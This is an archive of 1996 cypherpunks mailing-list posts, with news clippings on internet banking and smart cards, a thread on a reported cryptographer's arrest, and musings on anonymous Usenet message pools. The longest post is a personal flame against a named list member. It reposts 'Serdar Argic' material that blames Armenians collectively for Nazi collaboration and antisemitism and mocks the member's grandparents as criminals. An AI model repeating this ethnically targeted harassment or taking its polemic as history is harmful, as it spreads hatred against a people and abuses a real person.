Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 21 Oct 1996 16:42:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [NEWS] Crypto-relevant wire clippings
Message-ID: <Lu76VD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


American Banker: Friday, October 18, 1996

Internet Tops Bankers' List Of Leading-Edge Technologies

By DREW CLARK

A year ago, when the first U.S. bank was launched giving customers account
access through the Internet, nearly half of all banks in a survey said they
had no plans to follow its lead.

They have since changed their minds. The Internet is high on bankers'
emerging-technology priority lists, according to the 1996 American Banker
technology survey.

"The Internet is a medium that no banker can ignore," said Mary Donadoni, an
analyst with Payment Systems Inc., the Tampa-based research firm that
conducted the survey. To ignore it "is like saying you are not going to put a
branch on Main Street."

Over the past year, the number of U.S. banks, thrifts, and credit unions on
the Internet's World Wide Web has grown from 132 to more than 1,000, according
to James Bruene, editor of the Online Banking Report newsletter.

"Banks are making decisions now," said William A. Soward, director of
application marketing for Edify Corp. in Santa Clara, Calif. "Twelve months
ago, they were kicking tires and trying to understand what the issues were."

The American Banker/PSI survey showed one-third of the top 300 banks view
Internet-related issues as the most critical they face - second only to the
35% who cited nonbank competition.

Though only 10% of the top 300 U.S. banks offer Internet access to customers,
92% plan to by 1998.

Community banks are expressing slightly more reluctance about the medium. Some
8% now offer Internet access, and half said they plan to do so within two
years. They placed the Internet second on their list of concerns, behind
general technology and software issues.

"We're seeing more and more banks jumping on the bandwagon and saying,

'I need to do this,'" Mr. Soward said. "There is an emerging perception that a
lot of the security issues have been addressed, but I'm not sure that's gotten
out to the consumers."

The bankers' thoughts about interactive services are being translated into
action, with much of the emphasis on home banking via personal computer.

Many of the higher-profile moves by big banks -- such as Citibank's slashing
of fees for on-line customers, which caused subscribership to soar -- were
complemented by community banking initiatives. In its first five months



American Banker: Friday, October 18, 1996

Declining Costs Lead to an Explosion In On-Line Corporate Banking Services

By STEVEN MARJANOVIC

The increasingly competitive nature of business banking puts a premium on
technology to improve customer satisfaction, boost revenues, and keep costs
down. And that has brought an explosion in personal computers for connecting
banks with their business clients.

The American Banker technology survey indicated that 63% of the top 300 banks
offer businesses access to their banking information via personal computers.
Well over 90% plan to offer the information services by 1998, typically
including account balances, statements, and electronic funds transfers.

What's more, on-line corporate banking -- the equivalent of home banking for
wholesale customers -- is getting easier and cheaper for more small banks and
businesses.

George Hart, president of Harbinger Corp., an Atlanta-based supplier of cash
management software packages, said he has seen a marked increase in his
business this year.

About 25 banks are resellers of Harbinger's systems, including BankAmerica
Corp., Barnett Banks Inc., and smaller customers, such as United American Bank
of Memphis and Stillwater Bank and Trust Co., Stillwater, Okla.

"These types of services . . . are not expensive any more" Mr. Hart said.
"It's not a big deal to offer them."

Also hot in the corporate realm, according to the survey, is financial
electronic data interchange, or the exchange of payments and related
documentation in standard computer formats.

More than 40% of the top 300 banks plan to offer financial electronic data
interchange by 1998.

"We expect a lot of growth among companies in financial electronic data
interchange in the next three years," said Maria Erickson, director of
corporate services at Payment Systems Inc., which conducted the survey.

The economics become especially favorable, she added, if "you consider the
development of Internet-based financial EDI services."

Among a new breed of cash management services, integrated payable and
receivable services have garnered a lot of corporate attention lately,
especially among larger and middle-market companies.

Integrated payables are quickly growing in popularity from major banking
companies like Chase Manhattan Corp. and Wachovia Corp. The service



American Banker: Friday, October 18, 1996

A Second Bank Is Launched into Cyberspace

By JENNIFER KINGSON BLOOM

Almost a year to the day after the first Internet-based bank opened its
virtual doors, the second such entity -- Atlanta Internet Bank -- has begun
taking deposits.

The new bank, a part of Carolina First Corp., is hoping to skim customers off
the Internet by offering an eye-catching 7% interest rate on money market
accounts.

The founders say they are trying to prove the viability of the Internet as a
banking channel and to show that the low overhead associated with doing
business electronically can be passed on to customers.

In the last year and a half, several well-established banks have opened

"branches" on the Internet, enabling customers to pay bills, apply for loans,
and manipulate accounts on-line.

The services have proven popular, and both BankAmerica Corp. and Wells Fargo &
Co. say the number of customers migrating to the remote channel has "exceeded
expectations," although neither will divulge precise figures.

And last Oct. 18, a Kentucky banker named James S. "Chip" Mahan took the idea
to an extreme, establishing with great fanfare the Security First Network
Bank, in which customers transact business exclusively on-line and over the
telephone. The bank has since been spun off from its community bank parent,
Cardinal Bancshares, moved its physical operation to Atlanta, attracted more
than 4,000 customers, and amassed $15 million in assets.

Across town from Mr. Mahan, an Atlanta entrepreneur named T. Stephen Johnson
decided to put together a rival institution. Beginning early this year, he
hired a skeleton executive staff and secured an investment from Carolina
First, a $1.5 billion-asset bank based in Greenville, S.C. Then he forged a
partnership with AT&T and, this Tuesday, the bank went live on the
telecommunications giant's on-line service. Plans call for a full product line
by yearend.

"The reason we're so late in getting open is that we started watching to see
how this thing was unfolding," Mr. Johnson said. "It seemed you had to start
with Internet users and try to make bank customers out of them."

Today, the Atlanta Internet Bank exists as a "product" of Carolina First, said
Mack Whittle, the South Carolina bank's chief executive. But the term is
mostly semantic.

"Our plans are to roll it out as a separate, stand-alone financial institution
sometime in the next 12 months," he said.

Mr. Johnson said he has formed a corporate shell that is prepared to buy all
the new bank's accounts from Carolina First. "We wanted to go ahead and get in
business so we're doing it as a subsidiary, but we have a company that has a
right to buy all the accounts for a dollar," he said.

Mr. Whittle anticipates the Internet bank will raise private equity capital or
issue an initial public offering next year. Carolina First will own 40% of the
new entity, he said.

Mr. Whittle predicted the drift of customers to cyberspace would happen
"faster than most of us want it to," and said banks needed to learn quickly
how to deliver banking services electronically.

"It's about 70% cheaper to deliver it through the Internet than through
traditional means," he said. "Plus, the next generation of consumers is going
to demand it."

If Silicon Valley was the first to put Internet banking on the national map,
then Atlanta seems to have become the second pushpin.

Atlanta has "more PCs per capita and more Internet users per capita than
anywhere else in the South," Mr. Whittle said.

Even so, Mr. Whittle said, the Internet bank is reaching for a national
customer base, competing "very definitely" with Security First.

"We're trying to market this not to our customers as much as to Internet
users," he said. "It's a much easier sell for us to market to people who are
already accustomed to using the Internet."

Mr. Johnson takes a slightly different view.

"I hope they don't think we're competitors, because we don't think they're
competitors," Mr. Johnson said of Security First. "I think we both have a lot
of hard work ahead of us to get the public to use this as a means by which
they conduct financial business.

"We won't compete with Wells Fargo or any of the other people involved" in the
Internet banking arena, he said. "We all have a job to do, which is ultimately
to help all the banks get their overhead structure in line with other
businesses."

Michael McChesney, an officer of both Security First and a subsidiary, Five
Paces Inc., said the officers across town at the competing bank were "friends
of mine," and wished them luck. "I'd like to see anyone who gets on the
Internet doing banking succeed," Mr. McChesney said. "Our belief is that every
bank will be on the Internet in five years."

That said, Mr. McChesney also predicted the two banks would "compete
head-to-head for some Atlanta Internet customers" and that it would be a
"gentlemanly competition."

Despite the mutual kind words, some hard feelings may linger: the Atlanta
Internet Bank had originally agreed to use software supplied by Five Paces,
then changed its mind and chose a system from Edify Corp. instead.

The Atlanta Internet Bank tested its site with 60 to 70 people - mostly
Carolina First and AT&T employees - and drew 150 newcomers in its first few
days, said Donald Shapleigh, whose title is president of the Atlanta Internet
Bank.

The bank's Web site -- at www.atlantabank.com -- is spare, with far simpler
graphics than those of Security First and other banks in the virtual world.

"This is not Disney -- it's a bank," Mr. Shapleigh explained. "We want
convenience, speed, and access. We want people to feel like we're a bank, to
know that it's FDIC insured, but also to know that it's different because
we're a virtual bank.

"We don't have any branches and we're not interested in running a fleet of
branches. We want people who are savvy with computers."

For the first six weeks, the new service will be accessible only through
AT&T's WorldNet. WorldNet, which charges a flat rate for unlimited Internet
access, has 425,000 subscribers.

The on-line service is giving the Atlanta Internet Bank a free advertising
"banner" on its home page, placing subscribers a mouse-click away from the
bank. The banner will remain in place at least until the bank receives two
million "hits," or visits.

Mr. Johnson said his goal is to have 20,000 accounts after a year - or one for
each 100 hits. "Even credit card solicitations run about one percent," said
Mr. Johnson, who will be? the new bank's chairman.

Such a success rate would run counter to the experience of Security First
Network Bank, which has run banners on America Online and elsewhere. The
advertisements generated heavy traffic but relatively few accounts.

Beginning Dec.1, the Atlanta Internet Bank's products will be available to
anyone on the World Wide Web of the Internet.

The whopping 7% interest rate -- which applies only to a short-term money
market account -- will end at that time.

Future rates will be "very aggressive," said Ched Hoover, director of
marketing for the Atlanta Internet Bank. He said the highest money market rate
he had seen other banks offer was 5.5%, which his bank would beat.

Other initial offerings include interest-bearing checking accounts, direct
deposit, electronic bill payment, account transfer capability, and ATM cards.

Loan products and brokerage will be added by yearend, Mr. Johnson said.

The nascent bank has four officers and eight customer service representatives.
Mr. Shapleigh, the president, is a 20-year veteran of retail and corporate
banking who has worked at SunTrust Banks Inc. of Atlanta.

The tie-in with Atlanta Internet Bank is just the latest of several
quasi-experimental technology initiatives that Carolina First has begun
recently. The bank has installed 17 loan kiosks in shopping malls, and is
preparing to place others in automobile dealerships. It is also investing in
supermarket branches.

"Like most banks, we see the delivery system changing," Mr. Whittle said.

"We have tried to be as innovative as we can in seeking lesser expensive ways
of delivering the product, in ways that the customer of the future is going to
expect."


News Release (IBM): Tuesday, October 15, 1996

Smart Card Pilot To Be Initiated By American Express And IBM

Smart card to be used for "ticketless travel" on American Airlines

American Express Co. and IBM today announced plans to pilot a system which
will enable business travelers to move more quickly through airports by using
the world's first multi-purpose corporate "smart card."

By early December, the two companies will begin testing an American Express(R)
Corporate Card using IBM smart card technology for use with airlines'
electronic ticketing capability, often referred to as "ticketless travel."
Initially, these smart cards will be tested with American Airlines' enhanced
gate readers, which are now installed in 21 U.S. airports.

For travelers, this process eliminates the hassle of carrying a paper boarding
pass, enabling them to proceed directly to the gate after showing
identification at the airport. At the gate, the traveler inserts the smart
card into the gate reader, receives confirmation of seat assignment, and is
ready to board the plane.

In the pilot, American Express will issue fully-functional Corporate Cards,
featuring IBM's multi-function smart card (MFC) technology, to a select group
of employees at both companies.

The companies made the announcement at the International Air Transport
Association (IATA) Passenger Services Conference in Los Angeles. At the
conference, IATA delegates are expected to vote on a proposed resolution
establishing airline industry specifications for the use of smart cards.

Travel Industry Milestones

This product represents the first multi-purpose corporate card with a computer
chip, the first commercial smart card application by American Express, and the
first travel industry implementation of IBM's MFC technology. In this initial
application, the smart card will verify the electronic reservation and confirm
traveler identification in greater detail and with more reliability than
existing cards.

"This is an important first step in developing smart cards that allow business
travelers to 'do more,'" said Ed Gilligan, president of American Express
Corporate Services. "Smart cards will also allow travel suppliers to
streamline the check-in process and to enhance customer reward programs. At

American Express, our plan is to lead the way in developing smart cards that
provide customers with additional value, convenience and security as part of
an increasingly automated process from on-line booking to electronic expense
reporting."

"The travel industry is well-poised to take advantage of smart card and other
innovative technologies," said Jerry Cole, general manager of IBM's Worldwide
Travel and Transportation Industry Solutions Unit. "This application is
another prime example of IBM working with its customers to apply powerful
technologies in integrated solutions that translate into significant business
benefits."

American Airlines' AAccess system, which was launched in September, offers
passengers the option of automated check-in at the top 21 domestic airports,
which account for about 70 percent of the airlines' passenger boardings. The
enhanced gate readers, in addition to reading normal magnetic-stripe boarding
passes, will read charge cards and smart cards to issue boarding and seat
confirmations.

Smart Card Innovators

American Express, which along with IBM and American Airlines, is a member of
the Smart Card Forum, is developing a number of smart card applications to
provide customers with enhanced convenience and value. In travel, American
Express will pursue multi-function applications that will speed travelers past
check-in points at airports, hotels and car rental agencies.

"Our vision for smart card product development is to provide customers with an
array of innovative products that can store and capture monetary value and
information, extend payment options and perform a variety of non-financial
tasks," said David Boyles, senior vice president and head of the Smart Card
Center of Excellence at American Express. "This pilot with IBM demonstrates
American Express' commitment to assume a leadership role in shaping global
standards for smart cards to ensure a level playing field and to speed
development of new applications in a variety of industries."

At the IATA conference, IBM will demonstrate to the association's airline
members how the next generation of smart cards can enhance the entire
ticketless travel process -- from reservation to boarding. The steps in the
process include:

-- the passenger makes a reservation on-line through the Internet or other
on-line service, or through a travel agency;

-- the passenger then downloads the ticket confirmation number to a smart card
via personal computer with smart card capabilities or at an airport
self-service kiosk;

-- the passenger then checks in, using the smart card at the airline desk or
kiosk, and then proceeds to board, using an enhanced gate reader.

IBM has provided technology solutions, products and services to the travel
industry for more than 30 years. Many industries, including travel

-- airlines, lodging, car rentals and travel agencies

-- are quickly adopting technologies into their business operations. The IBM
Worldwide Travel and Transportation Industry Solutions Unit collaborated with
IBM's Smart Consumer Services group on this effort and will continue to do so
on future smart card solutions projects targeted to the travel industry.


And this one is especially for Timmy May: FIRST "GAY-FRIENDLY" MUTUAL FUND
In what appears to be the first of its kind, a new mutual fund has been
launched that is being marketed directly at homosexual men and women. "We
won't invest in companies unless they have a progressive policy towards gays
and lesbians," said Shelly Meyers, portfolio manager of the Meyers, Sheppard
Pride Fund. The 37-year-old Meyers, an MBA who describes herself as gay,
said she has found that the technology, financial services and consumer
services sectors have a higher proportion of companies that are "gay
friendly," with utilities and energy among the least friendly. The fund's
investment philosophy is value-oriented, seeking equities that are
undervalued, she said. The fund has about 40 issues in its portfolio, and
ranges between 35 and 55 stocks. Its top five holdings are: Arrow
Electronics Inc., McKesson Corp., Time Warner Inc., Glendale Federal Bank
and American Express Co.
-- Reuter, 10/18/96

MAJOR LONDON BANKS SKIP SIGNATURE VERIFICATION
The big four High Street banks have stopped checking whether customers have
put the correct signatures on personal checks for amounts below 1,000
pounds. Lloyds Bank, Barclays, NatWest and Midland have all decided that it
is less expensive to reimburse defrauded
customers than to instruct staff to scrutinise all checks. The banks last
week refused to confirm the existence of the limits, which start at 1,000
pounds and can be as high as 5,000 pounds at some branches.
-- The (London) Telegraph, 10/15/96

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Mon, 21 Oct 1996 16:36:15 -0700 (PDT)
To: Jim Byrd <byrd@ACM.ORG>
Subject: Re: Prof Shamir arrested
In-Reply-To: <2.2.32.19961021190029.0071d7a0@super.zippo.com>
Message-ID: <Pine.BSF.3.91.961021182616.13069A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 21 Oct 1996, Jim Byrd wrote:

> At 02:56 PM 10/21/96 +0100, Tom Womack <thomas.womack@merton.oxford.ac.uk>
> wrote:
> >
> >A few column inches in the British Independent had Prof Avi Shamir (who I 
> >guess is the S in RSA) arrested in Israel, on (I believe) suspicion of 
> >involvement in a substantial fraud.
> 
> The S in RSA is Adi Shamir.  Do you know if this is the same person? Do you
> have any more details?
> 
> 
Or is this the Avi Shamir who broke FEAL-8?

-r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Mon, 21 Oct 1996 16:28:50 -0700 (PDT)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: WOW!
In-Reply-To: <Pine.SUN.3.91.961014195648.7904A-100000@crl5.crl.com>
Message-ID: <Pine.SUN.3.91.961021192936.11167G-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 14 Oct 1996, Sandy Sandfort wrote:

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> I just totaled up the "Bring Dimitri to San Francisco" pledges.
> The pledges add up to an amazing US$681 and some guava pastries.
> Airfair should be around US$300.  That, plus hotel should come
> in under the amount pledged so far.  I'd still like additional
> pledges, however,  I want to be certain we're covered and as an 
> expression of the mood of the list. 

Pledge the rest to an AP fund. :)  I'd say that would be a good use of 
the funds.

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@sundernet.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |God of screwdrivers"|AK|        do you not understand?       |=======
========================http://www.sundernet.com=============================
      If the Macintosh is a woman...  Then Windows is a Transvestite!
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 21 Oct 1996 17:36:09 -0700 (PDT)
To: Ray Arachelian <sunder@brainlink.com>
Subject: Re: [SERDAR ARGIC] Ray Arachelian's role in the genocide of 2,500,000 Turks, Kurds, and Sephardic Jews
In-Reply-To: <Pine.SUN.3.91.961021113124.7879B-100000@beast.brainlink.com>
Message-ID: <RHa7VD27w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian <sunder@brainlink.com> writes:

> On Sun, 20 Oct 1996, Dr.Dimitri Vulis KOTM wrote:
>
> > > The friend and colleague of your whom you know says much about you. Yet
> > > another Net Loon. You action of posting a 48K spam to this list in attempt
> > > to get me upset has resulted in a single, half-felt yawn.  Others may be
> > > pissed at your attempt at spamming me.  I give not a shit.
> >
> > Dr. Serdar Argic is a world-famous historian and Ray makes
> > mistakes in English.
>
> And both your points are totally irrelevant, if not outright wrong.
>
> > > My original message to you stands: Vulis, grow up.
>
> <51Kb spam message deleted.>

Don't interfere with possible stego transmissions, Ray.

> Vulis, this is your 2nd spam to this list which is totally unrelated to
> any cypherpunk issues.  As this is totally off topic, flame mail, and
> spam, I suggest you grow up.  Again my original message to you stand:
> grow up.
>
> 2nd, since you are bent on sending your flames to this list, I move to
> vote you off the list.
>
> Have a nice day.

And I move to vote to legalize same-sex marriage. My good friend and colleague,
the world-famous historian Serdar Argic, has cited these additional references
concerning Ray Arachelian's criminal dandruff-covered grandparents:

 _Mitteilungsblatt_ Berlin, December 1939, Nr. 2 and 5-6

 Yet another historical fact: a fact that for years has been deliberately
 forgotten, concealed, and wiped from memory - the fact of Armenian-Nazi
 collaboration.

 A magazine called Mitteilungsblatt der Deutsch-Armenischen Gesselschaft
 is the clearest and most definite proof of this collaboration. The
 magazine was first published in Berlin in 1938 during Nazi rule of
 Germany and continued publication until the end of 1944. Even the
 name of the magazine, which implies a declaration of Armenian-Nazi
 cooperation, is attention-getting.

 This magazine, every issue of which proves the collaboration, is
 historically important as documentary evidence. It is a heap of
 writing that should be an admonition to world opinion and to all
 mankind.

 In Nazi Germany, Armenians were considered to be an Aryan race and
 certain political, economic, and social rights were thus granted to
 them. They occupied positions in public service and were partners in
 Nazi practices. The whole world of course knows what awaited those
 who were not considered _Aryan_ and what befell them.



The Tzeghagrons (Armenian Racial Patriots -- Nazi Armenians) was the
youth organization of the Armenians. It was based in Boston (where
Muslim/Jewish Holocaust apologists of SDPA/Armenian Church are located)
but had followers in Armenian colonies all over the world. Literally
Tzeghagron means _to make a religion of one's race._ The architect
of the Armenian Racial Patriots was Garegin Nezhdeh, a Nazi Armenian
who became a key leader of collaboration with Hitler in World War II.
In 1933, he had been invited to the United States by the Central
Committee of the Armenians to inspire and organize the American-Armenian
youth. Nezhdeh succeeded in unifying many local Armenian youth groups
in the Tzeghagrons. Starting with 20 chapters in the initial year, the
Tzeghagrons grew to 60 chapters and became the largest and most powerful
Nazi Armenian organization. Nezhdeh also provided the Tzeghagrons with
a philosophy:

 _The Racial Religious beliefs in his racial blood as a deity.
  Race above everything and before everything. Race comes first._[1]

[1] Quoted in John Roy Carlson (real name Arthur Derounian),
    _Armenian Affairs_ Winter, 1949-50, p. 19, footnote.



The Armenians were deeply anti-semitic as well. In the May 10,
1936 edition of _Hairenik Weekly_ (an official mouthpiece for
the ex-Soviet Armenian Government) the vice-mayor of Bucharest,
Rumania is quoted as saying:

_The Armenians helped us not to become the slaves of the Jewish
 elements in our country._

In another edition, an author named Captain George Haig writes:

_And the type of Jew who is imported to Palestine...is not anything
 to be proud about. Their loose morals, and other vices were
 unknown to the Arabs prior to Balfour Declaration, on top of
 all communist activities were the cause of most of the Arab
 criticism._[1]

[1] Captain George Haig, _The Case of Palestine_ in Hairenik
    Weekly, Friday, September 25, 1936.




As amply admitted by the ex-Soviet Armenian Government,
the Armenians were also fascist. Before Pearl Harbor,
the Dashnak daily _Hairenik_ [an official mouthpiece
for the ex-Soviet Armenian Government] (not to be confused
with the Tzeghagrons _Hairenik Weekly_) expressed pro-Nazi
sentiments:

_And came Adolf Hitler, after herculean struggles. He spoke
 to the racial heart strings of the German, opened the
 fountain of his national genius, strock down the spirit
 of defeatism...At no period since the World War had Berlin
 conducted so realistic, well organized, and planned policy
 as now, since Hitler's assumption to power...And whatever
 others may think concerning Hitlerism and Fascism as a
 system of Government, it is proved that they have revitalized
 and regenerated the two states, Germany and Italy._[1]

[1] _Hairenik_ official organ of the Dashnaktsuitune, Sept.
    17, 1936; quoted in John Roy Carlson (see endnote 1), p. 21.


  During World War II, while the Turkish Government was giving
  asylum to many Jews fleeing from Hitler's tyranny, anti-Semitism
  engulfed the Armenian circles in the Nazi-occupied territories.
  A publication of the Armenian Information Service in New York,
  entitled Dashnak Collaboration With The Nazi Regime, purports
  to show that Armenian sympathies with racism had reached dangerous
  proportions. The following quotation from the Armenian daily
  Hairenik of 19, 20 and 21 August 1936 exposes something much
  more than prejudice and bigotry:

   _Jews being the most fanatical nationalists and race-worshippers...
    are compelled to create an atmosphere..of internationalism and
    world citizenship in order to preserve their race...As the
    British use battleships to occupy lands..Jews use internationalism
    or communism as a weapon..Sometimes it is difficult to eradicate
    these poisonous elements when they have struck deep root like
    a chronic disease. And when it becomes necessary for a people
    to eradicate them...these attempts are regarded revolutionary.
    During a surgical operation, the flow of blood is a natural
    thing...Under such conditions, dictatorships seem to have a role
    of saviour [1]._

  [1] Quoted by James Mandalian: _Who are the Dashnags?_ Boston,
      Hairenik Press, 1944, pp. 13-4.



  In May 1935 the Armenians of Bucharest attacked the Jews of that
  city, while the Greeks of Salonika attacked the Jews in the August
  of the same year. During World War II, Armenian volunteers, under
  the wings of Hitler's Germany, were used in rounding up Jews and
  other ''undesirables'' destined for the Nazi concentration camps.
  The Armenians also published a German-language magazine, with fascist
  and anti-Semitic tendencies, supporting Nazi doctrines directed to
  the extermination of 'inferior' races [1].

  This is confirmed by Armenophil Christopher J. Walker, who admits
  that the Armenians collaborated with the Nazis. According to him,
  members of the Dashnak Party, then living in the occupied areas,
  including a number of prominent persons, entertained pro-Axis
  sympathies. A report in an American magazine went so far as to
  claim that the Nazis had picked on the Dashnaktsutiun to do fifth-
  column work, promising the party an autonomous state for its
  cooperation. Walker goes on to claim that relations between the
  Nazis and the Dashnaks living in the occupied areas were close and
  active. On 30 December 1941 an Armenian battalion was formed by a
  decision of the Army Command (Wehrmacht), known as the 'Armenian
  812th Battalion'. It was commanded by Dro, and was made up of a
  small number of committed recruits, and a larger number of Armenians.
  Early on, the total number of recruits was 8,000; this number later
  grew to 30,000. The 812th Battalion was operational in Crimea and
  the North Caucasus.(These are the dates and numbers given by Walker[3].)

  A year later, on 15 December 1942, an Armenian National Council
  was granted official recognition by Alfred Rosenberg, the German
  Minister of the occupied areas. The Council's president was
  Professor Ardashes Abeghian, its vice-president Abraham Giulkhandanian,
  and it numbered among its members Nzhdeh and Vahan Papazian. From that
  date until the end of 1944 it published a weekly journal, Armenien,
  edited by Viken Shant (the son of Levon), who also broadcast on Radio
  Berlin. The whole idea was to prove to the Germans that the Armenians
  were 'Aryans'. With the aid of Dr. Paul Rohrbach they seemed to have
  achieved this as the Nazis did not persecute the Armenians in the
  occupied lands [2].

  [1] Turkkaya Ataov: _Armenian Extermination of the Jews and Muslims_
      1984, p. 91.
  [2] C.J. Walker: _Armenia_ London, 1980, pp. 356-8.



  _Emperor Romanus I Lecapenus, in about 935, again ordered the
  forcible conversion of all the Jews of Byzantium, leading to the
  murder of hundreds of Jews and the desecration of many synagogues
  throughout the empire. All the while Jews came under increasingly
  savage attack by Byzantine popular preachers and writers as well as
  by officials trying to stir the populace in support of the Crusading
  knights coming from the West to wrest the Holy Land from the "infidel
  Muslims". As a result, Emperor Andronicus I Comnenus (1183-85) again
  attempted to convert the Jews to Christianity, though by persuasion
  and argument rather than force. When Crusaders passed through
  Constantinople on their way to the Holy Land, they invariably were
  assigned to camp next to the Jewish quarters, particularly that
  adjacent to the Galata Tower, and usually spent most of their spare
  time attacking and killing Jews and stealing their properties. At the
  same time they stirred local populace to similar activities. It was
  at this time, also, that Constantinople's Armenians joined the Greeks
  in attacking Judaism for the first time. [1]_

  [1] Yvonne Friedman, 'Antijudischen Polemik des 12 jahrhunderts',
      Kairos XXVI/1-2 (1984), 80-88.


  ''Blood libel accusations were made against Jews by Ottoman Christian
  subjects starting in the sixteenth century, most frequently in the
  Arab provinces, first at Jerusalem in 1546. The most famous Christian
  assault on Ottoman Jews in medieval times came in the central Anatolian
  town of Amasya some time between 1530 and 1540, when a blood-libel
  accusation against local Jews was spread by local Armenians who said
  that an Armenian woman had seen Jews slaughter a young Armenian boy
  and use his blood at the feast of Passover. Several days of rioting
  and pillaging and attacks on Jews followed...Later, however, the
  Armenian boy who supposedly had been murdered was found and the
  Ottoman governor punished the Armenian accusers, though nothing could
  be done about the Jews who had suffered.''[1]

  ''There were literally thousands of incidents in subsequent years,
  invariably resulting from accusations spread among Greeks and Armenians
  by word of mouth, or published in their newspapers, often by Christian
  financiers and merchants who were anxious to get the Jews out of the
  way, resulting in isolated and mob attacks on Jews, and burning of
  their shops and homes [2]. The attacks were brutal and without mercy.
  Women, children, and aged Jewish men were frequently attacked, beaten
  and often killed.''[3]

  [1] Stanford J. Shaw, ''Christian Anti-Semitism in the Ottoman Empire'',
      Belleten C. LIV, 68, p.1103 (1991).
  [2] Abraham Ben-Yakob (Jerusalem), ''The Immigration of Iraki Jews
      to the Holy Land in the 19th Century'', paper delivered to the
      First International Congress for the Study of Sephardic and
      Oriental Judaism, 27 June 1978.
  [3] Stanford J. Shaw, ''Christian Anti-Semitism in the Ottoman Empire'',
      Belleten C. LIV, 68, p.1129 (1991)


  By Andrew Sackser:

  Throughout history the children of  Israel have suffered at hands
  of  others. A  people set  apart  from their  neighbors by  their
  faith, countless. Jews have often had  to pay for this faith with
  their lives.  There was,  however, one haven  where Jews  did not
  suffer  the large-scale  persecution characterizing  their entire
  existence. This  haven was  Turkey. For  over five  hundred years
  Jews  have flourished  there,  enjoying relatively  uninterrupted
  freedom and  safety that has  only been rivaled in  America. This
  year marks  the quincentennial anniversary of  the ingathering of
  Jews to  Turkey, and highlights  one of the brighter  chapters in
  Jewish history.
  ...
  Source: HIRHURIM - The Jewish Magazine of Brendeis University
  (Massachusetts). Vol. 1, No: 2, Spring 1992




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 21 Oct 1996 19:52:21 -0700 (PDT)
To: Scott McGuire <cypherpunks@toad.com
Subject: Re: Usenet and Re: extortion via digital cash
Message-ID: <199610220252.TAA07533@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:34 AM 10/20/96 -0400, Scott McGuire wrote:
>"Timothy C. May" <tcmay@got.net> wrote:
>> At 11:01 PM -0400 10/15/96, Rabid Wombat wrote:
>> 
>> >Also - in order to communicate back to the perpetrator, the victim needs
>> >to communicate to the first step in the chain. The operator of that chain
>> 
>> BlackNet-type pools eliminate the chain. There is no "first step in the
>> chain," only a message pool or Usenet group which is propagated to tens of
>> thousands of sites around the world (and even available via one's satellite
>> dish and local cable, a la DirectPC, @Home, etc.).
>> 
>
>I've been thinking about the use of Usenet as a message pool and this seems to
>be a good place to bring up my thoughts.  As an already existing, widely
>disseminated and easily used message pool, Usenet is very valuable to us.  I'm
>concerned that it may not last though.  Many people now complain about how low
>the signal to noise ratio is (even more than they complain about this list). 
>I've heard people say that they have given up on newsgroups in favor of mailing
>list, web-zines, etc.  So, if it gets too bad, might it just fade away?  Or, if
>it remains but becomes unpopular, will it be easy to restrict if we use it for
>anonymous messages?

What's needed is a method for an individual to read all of Usenet, and more, 
without anybody else knowing what each individual is reading.  It's been 
mentioned before that on the back of those DSS boxes there's a connector 
which is supposed to eventually be able to provide computer data.  Somebody 
mentioned that the data rate of Usenet is 100 megabytes per day.  That works 
out to just about 9300 bits per second, continuous.  That's probably only 
about 1/1000th of the data required to represent a NTSC video picture, and 
so it's about 1/100,000th of the data rate of the dish.  

I don't know the economics of this service in any detail, but if we assume 2 
million such dishes generating about $1 of revenue per day,  1/100,000 of 
this revenue is about $20 per day.    Obviously, the cost of this bandwidth 
is miniscule compared with the number of people who might want to use it.  
Sure, they're not just going to carry Usetnet, of course; they'd probably 
carry email and other services as well.  However, many of the 
higher-bandwidth-consuming uses of the Internet will involve one-to-many 
broadcasting, which could be more easily provided by a dedicated satellite 
connection. Further, the company selling the dishes has a powerful 
motivation to make its product as useful as possible, since many people 
currently served by cable systems may have little reason to switch over 
absent a new feature. 

Given the low cost of this, there should always be enough bandwidth to 
implement some sort of blacknet-type system.

 






Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 21 Oct 1996 17:34:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [SERDAR ARGIC] Ray Arachelian's role in massacare of 2,500,000 Moslems
In-Reply-To: <326af0da1e81002@noc.tc.umn.edu>
Message-ID: <B2a7VD30w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


